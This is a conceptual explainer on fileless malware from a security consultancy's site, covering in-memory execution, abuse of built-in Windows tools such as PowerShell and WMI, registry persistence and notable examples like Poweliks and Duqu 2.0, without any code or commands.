What is Fileless Malware?

Threat Type: Fileless Malware

Category: Malware-Based Threat

Cyber Threat Indicators

Fileless malware is malicious software that operates primarily within a computer's memory (RAM) using legitimate, built-in system tools to carry out its attacks.

It is called "Fileless" because it avoids writing a malicious file or executable to the hard drive, making it extremely difficult to detect with traditional, signature-based antivirus solutions that rely on scanning the file system for known malware signatures.

Fileless malware relies on exploiting existing system tools and vulnerabilities.

Core Characteristics

In-Memory Residence: The malicious payload runs directly in the computer's Random Access Memory (RAM). This means that if the system is rebooted, the malware is typically erased, though attackers often establish persistence mechanisms (like registry manipulation) to ensure the attack survives a reboot.

Living off the Land (LotL): This is the central tactic. The malware abuses legitimate, trusted, native operating system tools (known as LOLBins or Living Off the Land Binaries) to perform its malicious actions. Because these tools are trusted, their activity is less likely to be flagged as suspicious by security software.

Evasion of Traditional Antivirus: Since there are no malicious files to scan for, signature-based detection (which looks for known file hashes or signatures) is ineffective. This lack of a file-based Indicator of Compromise (IOC) allows it to fly under the radar.

Low-Observable Characteristics: By leveraging trusted processes and avoiding disk writes, the attack leaves a minimal footprint, complicating forensic analysis and increasing the time an attacker can remain undetected (dwell time).

Living off the Land (LotL) Tools

Attackers commonly use powerful, pre-installed Windows tools for malicious purposes:

PowerShell: This is one of the most popular tools, used to execute malicious scripts directly in memory, download additional payloads, or perform reconnaissance and lateral movement across the network.

Windows Management Instrumentation (WMI): Attackers use WMI to execute code remotely, gain persistence (by setting up WMI event subscriptions that trigger malicious code), and manage systems.

Microsoft Office Macros (VBA): A malicious macro embedded in a Word or Excel document can execute a command (like launching PowerShell) once the user enables content, allowing the attack to begin in memory.

Regsvr32/Rundll32: These legitimate Windows binaries are often abused to execute code or DLLs.

Common Attack Tactics

Memory Injection: The malicious code is injected into the memory space of a legitimate, running process (e.g., a web browser or a system service) to hide its execution. Techniques include reflective loading (loading a malicious DLL directly into memory without it being stored on disk).

Registry-Resident Malware: To achieve persistence (surviving a reboot), the attacker writes the malicious payload as an encrypted or obfuscated script to a location in the Windows Registry that is automatically executed upon startup.

Exploit Kits: These toolkits leverage vulnerabilities in applications (like web browsers or plugins) to execute a shellcode payload directly in memory, which then kicks off the fileless infection chain.

Notable Fileless Malware Examples

Poweliks: One of the earliest widely known Trojans that used the Windows Registry to store its payload and maintain persistence.

Duqu 2.0: A highly sophisticated piece of malware that resided exclusively in memory, making it incredibly stealthy and linked to targeted espionage.

Operation Cobalt Kitty: An advanced persistent threat (APT) campaign that heavily utilized PowerShell scripts for its fileless attack stages.

---

VIIEGO the human security agency for human security research and consulting in identity manipulation and fraud prevention to decode human behavior and secure your identity.

www.viiego.com | Protect What's Yours.